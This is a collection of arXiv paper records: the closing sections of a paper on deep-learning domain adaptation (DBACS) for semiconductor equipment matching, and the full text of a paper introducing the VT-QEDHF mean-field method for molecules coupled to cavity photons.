dedicated meaning trained only on source train data and evaluated only on source test data respective trained only on target train data and evaluated only on target test data. for train and test. The first five CCs have a correlation higher than \(r=0.5\). ## 6 Equipment Matching Experiments Having with DBACS a methodology that allows parallel training and transfer in both directions - source to target but also target to source - mis- or abnormal behavior detected for aligned data can be compared to normal as well as abnormal data from source. These kind of comparisons enables equipment matching for nonidentical equipment with heterogeneous data representations. Figure 4: **T-SNE visualization before and after alignment with DBACS.** Graphical t-SNE representation of source and target domain in different stages of the alignment process: (a) shows features mapped by a randomly initialized aligner, (b) after the pretraining of the aligner and (c) after DA with DBACS is done. The source is colored in blue and contains data from equipment type 1, the target is colored red and contains data from the equipment type 2. The axes are dimensionless. The effect of the adaptation of the input features after DBACS is applied during training. The adaptation brings the distributions of the target domain closer and finally target overlaps source domain. Figure 5: True versus predicted scatter plot for DBACS before and after alignment. The graph shows predictions of aligned target data after mapped to source space by a randomly initialized aligner, after the pretraining of the aligner and predictions of aligned target data after DA training with DBACS is done. Only test data is presented, the test source data is colored in blue, the the aligned target test data is colored in red. First, we compare source signals with its cycled signals on the signal shape itself as well target signals with its cycled target signals. Examples from both are presented in Figure 7. Next, we check differences within source domain of samples having a high, middle and low prediction value. This helps to better understand univariate feature behavior for source. The middle prediction is the preferred and targeted one. Figure 8 shows euclidean barycenter averages of tree example signals from source domain for low, middle and high label values. Sensor offsets for deviating metrology measurements are clearly visible for some of the signals. For final equipment matching, we compare preferred shape of signals from the source domain meaning signals with metrology measurements close to target \(0.5\) (see Figure 8 to corresponding as well as deviating signals from target domain. Therefore, we use the DBACS to map selected source signals into the target domain. Different sensors measurements and their euclidean barycenter averages of groups according to low, middle and high metrology measurements are shown in Figure 9 and compared to mapped sensor signals (source to target) corresponding to the middle meaning preferred metrology group in the source domain. \begin{table} \begin{tabular}{c|c|c||c|c} \multicolumn{4}{c}{**VM prediction model performance for PCA based principle components**} \\ & \multicolumn{2}{c||}{Source domain} & \multicolumn{2}{c}{Target domain} \\ \hline & Train MAE & Test MAE & Train MAE & Test MAE \\ \hline \hline PCA(source) & \(0.09\) & \(0.09\) & \(0.32\) & \(0.33\) \\ \hline PCA(target) & \(0.47\) & \(0.47\) & \(0.12\) & \(0.13\) \\ \hline PCA(both) & \(0.10\) & \(0.14\) & \(0.09\) & \(0.14\) \\ \hline PCA+CORAL(both) & \(0.08\) & \(0.09\) & \(0.12\) & \(0.13\) \\ \end{tabular} \end{table} Table 2: **VM prediction model performance for PCA based principle components. Results for VM prediction models that are trained with reduced number of latent features that are created via PCA.** Figure 6: Aligner \(F\) and \(G\) visualizations of 2 times 3 raw sensor measurements of both equipment types before and after the corresponding alignment. The graph shows results for trained aligner \(F\) and mapped sensor signals from target to source domain in red and compares it to corresponding original source sensor signals plotted in black. It also shows results from trained aligner \(G\) and mapped sensor signals from source to target domain in blue and compares it to corresponding original target sensor signals plotted in black. A good alignment is visible as well. The x axis shows the timestamps of the sensor signals, y axis the sensor measurement values. ## 7 Conclusion and Future Work The paper presents DBACS, a Deep Learning approach that is able to deal with heterogeneous domain adaptation while allowing comparison of aligned signals for a VM use case in semiconductor manufacturing. Linear transformation methods from subspace alignment and multi-view learning are selected as benchmarks and show comparable results when training with data from both domains is possible. Especially for classification tasks, the correlation within CCA can be further exploited for cross-modal or mate-based retrieval. A big advantage of DBACS is the presented combination of domain adaptation with matching, two of the main approaches for standardization and scalability in the semiconductor field. Envisioned future work could go in the direction of root cause analysis based on the matching results. Another important step could to enrich the data with more equipment for multi-source or multi-target alignment. Other applications from semiconductor manufacturing like predictive maintenance and defect classification could be involved and tested for example against computer vision inspired state-of-the-art transfer learning benchmark models like pseudo-labeling. Since only offline model training is executed (training time is not a critical aspect of VM here), online model training could also be explored in that context. \begin{table} \begin{tabular}{c|c|c||c|c} & \multicolumn{2}{c||}{Source domain} & \multicolumn{2}{c}{Target domain} \\ \hline & Train MAE & Test MAE & Train MAE & Test MAE \\ \hline \hline CCA(source) & \(0.12\) & \(0.13\) & \(0.29\) & \(0.29\) \\ \hline CCA(target) & \(0.29\) & \(0.29\) & \(0.10\) & \(0.14\) \\ \hline CCA(both) & \(0.10\) & \(0.13\) & \(0.12\) & \(0.14\) \\ \hline CCA+CORAL(both) & \(0.07\) & \(0.08\) & \(0.13\) & \(0.13\) \\ \end{tabular} \end{table} Table 3: **VM prediction model performance for CCA based canonical components. Results for VM prediction models that are trained with latent features created via CCA.** Figure 7: **Aligner \(F\) and \(G\) visualizations of 2 times 3 cycled raw sensor measurements of both equipment types in its original form as well as after its bijective mapping. The first graph shows results for source signals and cycled source signals from source to target to source domain. The cycled signals are plotted in red and compared to its original source sensor signals plotted in black. The second graph shows results for target signals and cycled target signals from target to source back to target domain. The cycled signals are plotted in blue and compared to its original target sensor signals plotted in black. The x axis shows the timestamps of the sensor signals, y axis the sensor measurement values.** ## Acknowledgment Infineon Technologies AG is gratefully acknowledged for the financial support of this research. The Italian Government PNRR initiatives 'Partenariato 11: Made in Italy ciroclare e sostenibile' and 'Ecosistema dell'Innovazione - iNest' are also gratefully acknowledged for partially financing this research activity.
2310.18228
First-principles molecular quantum electrodynamics theory at all coupling strengths
The ever-growing intersection of quantum electrodynamics (QED) and molecular processes has shown remarkable and unanticipated advancements in altering molecular properties and reactivity by exploiting light-matter couplings. In recent years, multiple ab initio methods have been developed to compute the eigenstates of molecular systems strongly coupled to cavities, ranging from the mean-field to quantum many-body methods. The quantum many-body methods, such as coupled-cluster theories, usually rely on the quality of mean-field reference wavefunctions. Hence, developing efficient and physically reliable mean-filed approaches for molecular quantum electrodynamics problems is crucial. The current widely used methods, such as QED Hartree-Fock and the self-consistent counterpart, are limited to specific coupling regimes. In this work, we developed a variational transformation-based molecular quantum electrodynamics mean-field method, namely VT-QEDHF, for light-matter interaction at arbitrary coupling strength. The numerical benchmark demonstrates that the VT-QEDHF method naturally connects both QEDHF and self-consistent QEDHF methods at the two limits, showcasing the advantage of VT-QEHDF across all coupling strengths.
Xinyang Li, Yu Zhang
2023-10-27T16:07:09Z
http://arxiv.org/abs/2310.18228v2
# First-principles molecular quantum electrodynamics theory at all coupling strengths ###### Abstract The ever-growing intersection of quantum electrodynamics (QED) and molecular processes has shown remarkable and unanticipated advancements in altering molecular properties and reactivity by exploiting light-matter couplings. In recent years, multiple ab initio methods have been developed to compute the eigenstates of molecular systems strongly coupled to cavities, ranging from the mean-field to quantum many-body methods. The quantum many-body methods, such as coupled-cluster theories, usually rely on the quality of mean-field reference wavefunctions. Hence, developing efficient and physically reliable mean-filed approaches for molecular quantum electrodynamics problems is crucial. The current widely used methods, such as QED Hartree-Fock and the self-consistent counterpart, are limited to specific coupling regimes. In this work, we developed a variational transformation-based molecular quantum electrodynamics mean-field method, namely VT-QEDHF, for light-matter interaction at arbitrary coupling strength. The numerical benchmark demonstrates that the VT-QEDHF method naturally connects both QEDHF and self-consistent QEDHF methods at the two limits, showcasing the advantage of VT-QEDHF across all coupling strengths. ## I Introduction. The increasing overlap between quantum electrodynamics (QED) and molecular activities has led to breakthroughs in tailoring molecular properties and activities through light-matter interactions [1; 2; 3]. When strongly coupled, both photons and electrons (or other elementary excitations) within materials become essential and intermingle equally quantized. In such an environment, the concept of independent "free" particles ceases to exist. Instead, the elementary excitations in the strong light-matter interaction regime are polaritons, which represent a superposition between quantized light and material [4] and display characteristics of both light and matter. Research suggests that material properties can be modulated via these polaritons, engendering a diversity of photophysical and photochemical phenomena; that is, polariton chemistry [1]. Given that the energies of photons and the strength of light-matter interactions can be fine-tuned through cavity manipulations, the robust coupling between light and matter unveils a novel paradigm for modifying material characteristics, with a spectrum of possible applications including lasing [5; 6], long-distance energy transmission [7; 8; 9; 10; 11], Bose-Einstein condensates [12; 13; 14], and various chemical processes [15; 16; 17; 18; 19; 20; 21; 22; 23; 24; 25; 26; 27; 28; 29; 30; 31; 32; 33; 34; 35; 36]. In the thriving field of polariton chemistry (or molecular quantum electrodynamics at large), investigating the influence of arbitrary light-matter coupling strengths on molecular properties and behaviors necessitates a robust and universally applicable theoretical approach [37]. However, the absence of a reliable theoretical framework that seamlessly traverses all coupling regimes hinders the full potential of QED-assisted modulation of molecular properties. Despite significant progress in understanding the effects of confined fields on many molecular characteristics, a comprehensive and first-principles framework for exploring these phenomena across all coupling regimes is still lacking. To date, variational theories [38], QED Hartree-Fock (QEDHF) [39; 40], semi-empirical method [41], QED Density Functional Theory (QED-DFT) [42; 43; 44; 45], QED coupled cluster (QED-CC) [3; 46; 47; 3; 48], QED Time-Dependent Density Functional Theory (QED-TDDFT) [48], and Diffusion Quantum Monte Carlo [49] methods have been proposed to study the light-matter interactions. In particular, post-Hartree-Fock methods depend on an optimal mean-field theory (as the reference state) to achieve better accuracy. Although they are effective in addressing several aspects of molecular interactions within quantum fields, the existing QEDHF methods [39] and their self-consistent counterparts [40] are primarily limited to specific coupling strengths. To address this research gap, we introduce a variational transformation [50] based first-principles QED method, referred to as the VT-QEDHF. This universal approach is designed to function effectively across arbitrary coupling strengths, thereby providing an invaluable tool for exploring and understanding light-matter interactions in a more comprehensive and efficient manner. The VT-QEDHF method transcends the limitations of traditional perturbative and strong coupling approaches, offering a more universal perspective on molecular processes in QED environments. Within the VT-QEDHF framework, the photonic field contribution is accounted for in a nonperturbative manner, ensuring the attainment of the exact wave function in the limit of infinite coupling, thereby providing a consistent and reliable molecular orbital description across various coupling regimes. This first-principles approach not only captures the electron-photon correlation (at the mean-field level) effectively but also elucidates the cavity effects on the electronic ground state while maintaining a manageable computational cost. By bridging the theoretical gap across coupling strengths, the VT-QEDHF method is anticipated to open new avenues for the study and manipulation of molecular properties and behaviors within QED environments, offering enriched insights and enhancing the predictability and control over light-matter interactions. ## II Theory The total light-matter Hamiltonian of molecular quantum electrodynamics can be described as the widely used nonrelativistic Pauli-Fierz Hamiltonian in the dipole approximation [2; 3; 51], \[\hat{H}_{\mathrm{PF}}= \hat{H}_{\mathrm{e}}+\sum_{\alpha}\Big{[}\omega_{\alpha}(\hat{a} _{\alpha}^{\dagger}\hat{a}_{\alpha}+\frac{1}{2})\] \[+\sqrt{\frac{\omega_{\alpha}}{2}}\mathbf{\lambda}_{\alpha}\cdot\hat{ \mathbf{D}}(\hat{a}_{\alpha}^{\dagger}+\hat{a}_{\alpha})+\frac{1}{2}(\mathbf{\lambda} _{\alpha}\cdot\hat{\mathbf{D}})^{2}\Big{]}. \tag{1}\] This Hamiltonian is often referred to as the Pauli-Fierz (PF) Hamiltonian. Where \(\hat{H}_{\mathrm{e}}=\hat{T}_{\mathrm{e}}+\hat{V}\) is the bare molecular Hamiltonian (excluding the nuclear kinetic operator) which includes all Coulomb interactions \(\hat{V}\) between electrons and nuclei as well as the electronic kinetic energy operators \(\hat{T}_{\mathrm{e}}\), which is given by the expression, \[\hat{H}_{e}=\sum_{\mu\nu}h_{\mu\nu}\hat{c}_{\mu}^{\dagger}\hat{c}_{\nu}+\frac {1}{2}\sum_{\mu\nu\lambda\sigma}I_{\mu\nu\lambda\sigma}\hat{c}_{\mu}^{\dagger} \hat{c}_{\lambda}^{\dagger}\hat{c}_{\sigma}\hat{c}_{\nu}. \tag{2}\] Where \(h\) and \(I\) are one-electron and two-electron integrals. \(\hat{\mathbf{D}}\) in Eq. 1 is the molecular dipole operator, \[\hat{\mathbf{D}}=\sum_{i}^{N_{\mathrm{n}}}z_{i}\hat{\mathbf{R}}_{i}-\sum_{i}^{N_{ \mathrm{e}}}e\hat{\mathbf{r}}_{i}\equiv\hat{\mathbf{D}}_{n}+\hat{\mathbf{D}}_{e}, \tag{3}\] including electronic \(\hat{\mathbf{D}}_{e}\) and nuclear \(\hat{\mathbf{D}}_{n}\) components. \(\mathbf{\lambda}_{\alpha}=\sqrt{\frac{1}{\epsilon_{0}V}}\mathbf{e}_{\alpha}\equiv \lambda_{\alpha}\mathbf{e}_{\alpha}\) characterizes the coupling between the molecule and cavity quantized field. \(\omega_{\alpha}\) and \(\mathbf{e}_{\alpha}\) represent the frequency and polarization of the electric field of cavity photon mode \(\alpha\). The last term describes the dipole self-energy (DSE), which is essential to ensure the Hamiltonian is bounded from below and displays the correct scaling with the system size [52]. The eigenstate of the molecular QED Hamiltonian can be readily obtained by solving the time-independent Schrodinger equation \[\hat{H}_{\mathrm{PF}}\ket{\Psi}=E\ket{\Psi}, \tag{4}\] where \(\ket{\Psi}\) is the correlated electron-photon wavefunction, though the exact solution to the above quantum many-body equation is nontrivial. The mean-field approach is usually the first and fastest method to approximate the quantum many-body problems. At the mean-field level, the QED Hamiltonian can be approximated by \(\ket{\Psi}\approx\ket{\mathrm{HF}}\otimes\ket{0}\) where \(\ket{0}\) denotes the photon vacuum state. Consequently, the total energy can be easily introduced via, \[E_{\mathrm{tot}}=E_{HF}+\frac{1}{2}\sum_{\alpha}\langle(\mathbf{\lambda}_{\alpha} \cdot\hat{\mathbf{D}})^{2}\rangle. \tag{5}\] Where the \(E_{HF}\) denotes the electronic HF energy. The DSE contribution to the total energy (second term on the right-hand side of the above equation) can be evaluated via the DSE-mediated one-electron and two-electron integrals (see more details in Supplementary Materials (SM)). Thus, the corresponding Fock matrix (for computing density matrix and molecular orbital properties) can be readily derived by taking the partial derivative of the total energy with respect to the density matrix [39; 53]. The resulting QEDHF method (in the Fock state representation) provides an economical way to compute the polariton ground state and can serve as the reference for other post-HF methods. The key drawback of the QEDHF method in the Fock representation is the slow convergence with the Fock state in the strong coupling limit, which can lead to incorrect behavior, such as incorrect origin-dependency and frequency dependency [53], making the QEDHF method in Fock state representation more suitable for weak coupling systems (as the Fock state is the eigenstate of the interaction Hamiltonian in the \(\lambda\to 0\) limit). Such drawbacks can be mitigated with the coherent state (CS) representation [54], \[\ket{z_{\alpha}}\equiv e^{z_{\alpha}\hat{a}_{\alpha}^{\dagger}-z_{\alpha}^{*} \hat{a}_{\alpha}}\ket{0}\equiv\hat{U}(z_{\alpha})\ket{0}, \tag{6}\] where \(z_{\alpha}=-\frac{\langle\mathbf{\lambda}_{\alpha}\cdot\hat{\mathbf{D}}\rangle_{ \mathrm{HF}}}{\sqrt{2\omega_{\alpha}}}\). It's clear from the above equation that CS is a linear combination of complete Fock states where the coefficients are determined by the displacement due to the light-matter coupling strength. The resulting QEDHF in CS representation [39] thus mitigates the origin-variance problem. However, the molecular orbitals and Fock matrix remain origin-dependent charged systems in [53]. Only recently, a fully origin-invariant formulation was developed within a self-consistent strong coupling QEDHF formalism (namely SC-QEDHF). The SC-QEDHF framework is stimulated by the fact that, in the infinite coupling limit (i.e., \(\hat{H}_{e}\ll\hat{H}_{\mathrm{p}}+\hat{H}_{\mathrm{ep}}\) or \(\lambda_{\alpha}\rightarrow\infty\)), the Hamiltonian is dominated by the photon and electron-photon interaction terms, and the corresponding wavefunction can be well approximated by a Gaussian state, \[\ket{\Psi^{\infty}}=e^{-\sum_{\alpha}\frac{\lambda_{\alpha}}{\sqrt{2\omega_{ \alpha}}}\mathbf{e}_{\alpha}\cdot\hat{\mathbf{D}}(\hat{a}_{\alpha}-\hat{a}_{\alpha}^{ \dagger})}\ket{\mathrm{HF},0}\equiv\hat{U}_{\lambda}\ket{\mathrm{HF},0}. \tag{7}\] This is widely recognized as the polaron transformation within the context of electron-phonon interaction scenarios [55; 56; 57]. This approach has recently been adapted for use in polariton chemistry [58; 40; 59]. Consequently, we can employ the \(\hat{U}_{\lambda}\) operator to transpose the Hamiltonian into a new framework, wherein the resultant transformed Hamiltonian effectively eliminates the explicit electron-photon coupling terms. In particular, after undergoing the transformation, the electronic and photonic operators become \[\hat{U}_{\lambda}^{\dagger}\hat{c}_{\nu}\hat{U}_{\lambda}= \sum_{\mu}\hat{c}_{\mu}X_{\mu\nu}, \tag{8}\] \[\hat{U}_{\lambda}^{\dagger}\hat{a}_{\alpha}\hat{U}_{\lambda}= \hat{a}_{\alpha}-\frac{\lambda_{\alpha}}{\sqrt{2\omega_{\alpha}}} \mathbf{e}_{\alpha}\cdot\hat{\mathbf{D}}, \tag{9}\] where \(X_{\mu\nu}=\exp\left[-\sum_{\alpha}\frac{\lambda_{\alpha}}{\sqrt{2\omega_{ \alpha}}}\mathbf{e}_{\alpha}\cdot\hat{\mathbf{D}}(\hat{a}_{\alpha}^{\dagger}-\hat{a}_ {\alpha})\right]|_{\mu\nu}\). Consequently, under the polariton transformation, the resulting Hamiltonian becomes (denoted as \(\hat{H}^{p}\)) \[\hat{H}^{p}=\hat{U}_{\lambda}^{\dagger}\hat{H}_{\text{PF}}\hat{U}_{\lambda}= \hat{U}_{\lambda}^{\dagger}\hat{H}_{e}\hat{U}_{\lambda}+\sum_{\alpha}\omega_{ \alpha}\hat{a}_{\alpha}^{\dagger}\hat{a}_{\alpha}. \tag{10}\] The transformed electronic Hamiltonian \(\tilde{H}_{e}\equiv\hat{U}_{\lambda}^{\dagger}\hat{H}_{e}\hat{U}_{\lambda}\) is formally the same as the original one with the electronic operators dressed by the \(X\) operator. Since the dipole coupling operator \(\mathbf{e}_{\alpha}\cdot\hat{\mathbf{D}}\) in the \(X\) operator is not diagonal, it's more convenient to transform the operator into the dipole basis (defined as the eigenstate of \(\mathbf{e}_{\alpha}\cdot\hat{\mathbf{D}}\) operator, denoted by the symbols \(p,q,r,s\) and the corresponding eigenvalues are denoted as \(\eta_{p}\)). Then, the corresponding QEDHF energies and Fock matrix can be derived. More details can be found in Ref. [40]. To bridge the treatment in weak and strong coupling limits, here we present a variational transformation-based QEDHF method for the arbitrary coupling regime. The central idea is that, instead of using \(\hat{U}_{\lambda}\), we adopt variational parameters \(f_{\alpha}\) to control the variational transformation \(\hat{U}_{f}\)[60] (also called Lang-Firsov transformation [61]) \[\hat{U}_{f}=e^{-\sum_{\alpha}\frac{f_{\alpha}}{\sqrt{2\omega_{\alpha}}}\mathbf{e} _{\alpha}\cdot\hat{\mathbf{D}}(\hat{a}_{\alpha}-\hat{a}_{\alpha}^{\dagger})}. \tag{11}\] which helps the seek for an optimal mean-field approximation to the cavity QED Hamiltonian. Such idea has been previously used in strong electron/exciton-phonon interactions, including exciton transport [60], polaron formation [62; 63; 64], and dissipative quantum transport [65; 66; 50]. With the variational transformation (VT), the resulting Hamiltonians become, \[\hat{H}(\{f_{\alpha}\})= \tilde{H}_{e}(\{f_{\alpha}\})+\sum_{\alpha}\omega_{\alpha}\hat{a} _{\alpha}^{\dagger}\hat{a}_{\alpha}\] \[+\sum_{\alpha}\sqrt{\frac{\omega_{\alpha}}{2}}(\Delta\lambda_{ \alpha})\mathbf{e}_{\alpha}\cdot\hat{\mathbf{D}}(\hat{a}_{\alpha}^{\dagger}+\hat{a}_{ \alpha})\] \[+\frac{(\Delta\lambda_{\alpha})^{2}}{2}(\mathbf{e}_{\alpha}\cdot\hat{ \mathbf{D}})^{2}. \tag{12}\] where \(\Delta\lambda_{\alpha}=\lambda_{\alpha}-f_{\alpha}\) and the parameters \(f_{\alpha}\) are to be variationally minimized. \(\tilde{H}_{e}(\{f_{\alpha}\})\) is the VT dressed electronic Hamiltonian, where the original electronic operator becomes \(\hat{U}_{e}^{\dagger}\hat{c}_{\nu}\hat{U}_{f}=\sum_{\nu}\hat{c}_{\nu}X_{\mu\nu} ^{f}\) and \(X_{\mu\nu}^{f}=\exp\left[-\sum_{\alpha}\frac{f_{\alpha}}{\sqrt{2\omega_{ \alpha}}}\mathbf{e}_{\alpha}\cdot\hat{\mathbf{D}}(\hat{a}_{\alpha}^{\dagger}-\hat{a}_ {\alpha})\right]|_{\mu\nu}\). The detailed derivation can be found in Supplementary Materials (SM). Compared to the fully transformed polariton Hamiltonian in Eq. 10, the variationally transformed Hamiltonian in Eq. 12 includes a partially dressed electronic Hamiltonian \(\tilde{H}_{e}(\{f_{\alpha}\})\) and residues in the bilinear coupling and DSE terms (controlled by \(f_{\alpha}\)). The last two terms in Eq. 12 are referred to as the residual bilinear coupling and DSE terms, respectively. It's obvious that when \(f_{\alpha}/\lambda_{\alpha}=0\) (or 1), Eq. 12 reduces to the original PF Hamiltonian \(\tilde{H}_{PF}\) or fully transformed polariton Hamiltonian \(\tilde{H}^{p}\). It should be noted that the transformed Hamiltonians in Equations 12 and 10 are both exact, as no approximation was made in the transformation. The exact diagonalization of the two Hamiltonians should give the same eigenstates. Applying the mean-field approximation to the wavefunction allows us to define the VT-QEDHF wave function as \[\ket{\Psi}=e^{-\frac{f_{\alpha}}{\sqrt{2\omega_{\alpha}}}\mathbf{e}_{\alpha}\cdot \hat{\mathbf{D}}(\hat{a}_{\alpha}-\hat{a}_{\alpha}^{\dagger})}\ket{\text{HF},0} \equiv\hat{U}_{f}\ket{\text{HF},0}. \tag{13}\] In the dipole basis [67], this becomes \[\ket{\Psi}=e^{-\frac{f_{\alpha}}{\sqrt{2\omega_{\alpha}}}\sum_{p}\eta_{p}\hat{ c}_{p}^{\dagger}\hat{c}_{p}(a_{\alpha}-a_{\alpha}^{\dagger})}\ket{\text{HF},0}, \tag{14}\] and the transformed electronic operators in the dipole basis are given by \[\hat{U}_{f}^{\dagger}\hat{c}_{p}\hat{U}_{f}=\sum_{\nu}\hat{c}_{p}X_{p}^{f}, \tag{15}\] where \(X_{p}^{f}=\exp\left[-\sum_{\alpha}\frac{f_{\alpha}}{\sqrt{2\omega_{\alpha}}}( \mathbf{e}_{\alpha}\cdot\hat{\mathbf{D}})_{pp}(\hat{a}_{\alpha}^{\dagger}-\hat{a}_{ \alpha})\right]\). Consequently, the VT-QEDHF energy in the dipole basis becomes \[E= \sum_{pq}\tilde{h}_{pq}\rho_{pq}G_{pq}+\frac{1}{2}\sum_{pqrs}\tilde {I}_{pqrs}\left(\rho_{pq}\rho_{rs}-\frac{1}{2}\rho_{ps}\rho_{rq}\right)G_{pqrs} +\frac{f_{\alpha}^{2}}{2}\sum_{p}\rho_{pp}\left[(\mathbf{e}_{\alpha}\cdot\mathbf{D})_{pp }-\eta_{p}\right]^{2}\] \[+\frac{f_{\alpha}^{2}}{2}\sum_{pq}\left(\rho_{pp}\rho_{qq}-\frac{1}{2 }\rho_{pq}\rho_{qp}\right)\left[(\mathbf{e}_{\alpha}\cdot\mathbf{D})_{pp}-\eta_{p} \right]\left[(\mathbf{e}_{\alpha}\cdot\mathbf{D})_{qq}-\eta_{q}\right]+\frac{(\Delta \lambda_{\alpha})^{2}}{2}\bra{\text{HF}}\bra{0}\left(\mathbf{e}_{\alpha}\cdot\hat{ \mathbf{D}}\right)^{2}\ket{\text{HF}}\ket{0}. \tag{16}\] Here, \(\tilde{h}\) and \(\tilde{I}\) represent one-electron and two-electron integrals in the dipole basis, respectively, \(\rho_{pq}\) is the density matrix, and \(G\) are the Franck-Condon factors derived by integrating out the photonic degrees of freedom from the VT-dressed one-/two-electron integrals (i.e., \(\bra{0}(X^{f})_{p}^{\dagger}X_{q}^{f}\ket{0}\)[50; 56]). The first two terms in Eq. (16) are formally the same as the HF energy of the pure electronic system, but with one-/two-electron integrals replaced by the VT-dressed ones. The third and fourth terms account for relaxation in the dipole basis set [40]. Finally, the last term in Eq. (16) represents the residual DSE. The explicit form of \(G\) can be found in the Supplementary Material (SM). The corresponding Fock matrix can be derived from the energy derivatives with respect to the density matrix. Moreover, the optimal \(\{f_{\alpha}\}\) can also be optimized during the SCF procedure via the energy derivatives with respect to \(f_{\alpha}\) (i.e., \(\frac{\partial E}{\partial f_{\alpha}}\)). The detailed formulas for the Fock matrix and \(\frac{\partial E}{\partial f_{\alpha}}\), which are used for updating the density matrix and variational parameters, can be found in the SM. Additionally, VT-QEDHF can be augmented with the CS basis set, defined by the residue bilinear coupling as \(z_{\alpha}^{f}\equiv-\frac{f_{\alpha}\langle\mathbf{e}_{\alpha}\cdot\mathbf{D}\rangle }{\sqrt{2\omega_{\alpha}}}=-\frac{f_{\alpha}}{\lambda_{\alpha}}z_{\alpha}\), leading to the effective ansatz \[\Psi=e^{-\sum_{\alpha p}\frac{f_{\alpha}}{\sqrt{2\omega_{\alpha}}}\eta e_{p}^ {\dagger}\hat{c}_{p}(a_{\alpha}-a_{\alpha}^{\dagger})}\hat{U}(z_{\alpha}^{f} )\ket{\text{HF}}\ket{0}. \tag{17}\] This resulting formalism is denoted as the VT-QEDHF-CS method. ## III Numerical examples We demonstrate the validity and advantages of the VT-QEDHF method across various coupling strengths using a sample molecule (C\({}_{2}\)N\({}_{2}\)H\({}_{6}\) isomer, with the STO-3G basis set employed). Configurations of the isomer along the trans-cis pathway are detailed in the Supplementary Material (SM). Figure 1 plots the ground state energy of the C\({}_{2}\)N\({}_{2}\)H\({}_{6}\) molecule using different methods. The VT-QEDHF method with a predefined variational parameter \(f\) (i.e., without optimizing \(f\)) is referred to as the VT-QEDHF(f) method. This method shows a natural progression to the QEDHF and SC-QEDHF methods at the limits of \(f=0\) and \(f=\lambda\), respectively. The red star in Figure 1 indicates the optimized VT-QEDHF energy, which is the lowest among the VT-QEDHF(f) energies as shown. The optimized \(f\) values for the weaker (Figure 1a) and stronger (Figure 1b) coupling cases are 0.53 and 0.73, respectively. These values suggest that stronger couplings necessitate greater transformation in the Hamiltonian, with the corresponding results more closely aligned with the SC-QEDHF method. Furthermore, the additional optimization of \(f\) does not notably amplify the SCF optimization workload. For the calculations in Fig 1, the SC-QEDHF method reaches convergence after 26 iterations, while the VT-QEDHF method meets the same criteria after 36 iterations, indicating a marginal increase in computational duration. Although the VT-QEDHF method incorporates both VT-dressed and DSE-mediated one-/two-electron integrals, the computation of the VT-dressed one-electron and two-electron integrals predominantly contributes to the bottleneck. This computation must be undertaken in every iteration, which is the same in the SC-QEDHF method. Consequently, the computational expenses of the VT-QEDHF and scQEDHF methods are nearly equivalent. Subsequently, we determined the polariton ground state energies along the trans-cis reaction pathway using the HF and QEDHF methods. These results are depicted in Fig. 2, with the photon frequency and coupling parameter (\(\lambda\)) set at 0.1 and 0.5 au, respectively. Compared with the QEDHF and SC-QEDHF methods, VT-QEDHF captures a larger amount of electron-photon Figure 1: VT-QEDHF energies as a function of the transformation parameter \(f\), showing a natural connection to QEDHF and SC-QEDHF methods at the two limits, i.e., with (\(f=1\), red dot) and without (\(f=0\), purple square) polariton transformation. The photon frequency \(\omega\) is set to 0.5 au. The coupling strengths \(\lambda\) are a) 0.05 and b) 0.5, respectively. correlation. This leads to reduced ground state energies throughout the reaction pathway, underscoring its reliable performance along the reaction coordinate. We investigated the optimal variational transformation \(f\) across varying photon frequencies and electron-photon coupling strengths. The LiH molecule is used here to scan a wide parameter space efficiently. These results are illustrated in Fig. 3. As anticipated, varying electron-photon coupling strengths dictate distinct optimal values for \(f\) in the variational transformation. Moreover, \(f\) displays a consistent increase with the electron-photon coupling strength \(\lambda\). As \(\lambda\) tends toward small values, the ratio \(f/\lambda\) gravitates towards zero or a finite value contingent on photon energies. Nevertheless, in the weak coupling scenario where \(\lambda\to 0\), the \(f/\lambda\) ratio remains low, aligning with a minimal (or no) polariton transformation limit. Conversely, the \(f/\lambda\) ratio is near unity in the strong coupling domain, reflecting a comprehensive polariton transformation. Within the intermediate range, the variational transformation culminates with a finite value for \(f/\lambda\). This highlights the imperative nature of the variational transformation across a broad parameter regime to obtain optimal mean-field ground states. ## IV Summary In summary, this study introduces the variational transformation-based electronic structure theory (VT-QEDHF) for molecular QED applications encompassing all ranges of coupling strengths. This methodology adepted captures the optimal mean-field part of both electron-photon and photon-mediated electron-electron correlations. Furthermore, this framework is universally applicable to any fermion-boson interaction, making it suitable for studying the coupling of electrons with other quantized bosonic entities such as plasmons and phonons. As an example, our approach can be extended to the investigation of polaron formation from the first principles. While VT-QEDHF is robust across all coupling strengths at the mean-field level, it inherently underestimates both intrinsic and photon-mediated electronic correlations. To address this limitation, our forthcoming research will focus on the integration of VT-QEDHF into QED-CCSD and EOM-CCSD frameworks. Given the superior performance of VT-QEDHF over existing QEDHF and SC-QEDHF methods, we are optimistic that the advanced QED-CC methods augmented with VT-QEDHF [3; 45; 46; 39] will significantly improve correlation energy estimations in all coupling regimes. Additional note: While drafting this manuscript, we became aware of a recent paper that employs similar concepts [68]. However, the variational transformation in Ref. [68] is limited to diagonal terms (of the dipole coupling operator) in the transformation. In contrast, our transformation is more general, and the corresponding elements are evaluated within the dipole basis. ###### Acknowledgements. We acknowledge support from the US DOE, Office of Science, Basic Energy Sciences, Chemical Sciences, Geosciences, and Biosciences Division under Triad National Security, LLC ("Triad") contract Grant 89233218CNA000001 (FWP: LANLECF7). This research used computational resources provided by the Institutional Computing (IC) Program and the Darwin testbed at Los Alamos National Laboratory (LANL), Figure 3: The relationship between optimized variational transformation parameters (\(f/\lambda\)) and photon frequencies, with respect to scaled coupling strengths (\(\lambda/\sqrt{\omega}\)). The parameter \(f/\lambda\) trends towards 0 and 1 in the regimes of weak and strong coupling, respectively. Figure 2: Ground state potential energy surfaces of C\({}_{2}\)N\({}_{2}\)H\({}_{6}\) isomer calculated from different methods. The photon frequency and coupling strength (\(\lambda\)) are 0.1 and 0.5 au, respectively. which is funded by the Computational Systems and Software Environments subprogram of LANL's Advanced Simulation and Computing program. LANL is operated by Triad National Security, LLC, for the National Nuclear Security Administration of the U.S. Department of Energy (Contract No. 89233218CNA000001). **Data availability.** The data supporting this study's findings are available from the corresponding author upon request. **Code availability.** The developed code used for this study is available from the corresponding author upon request.
2303.07230
Systematic Evaluation of Deep Learning Models for Log-based Failure Prediction
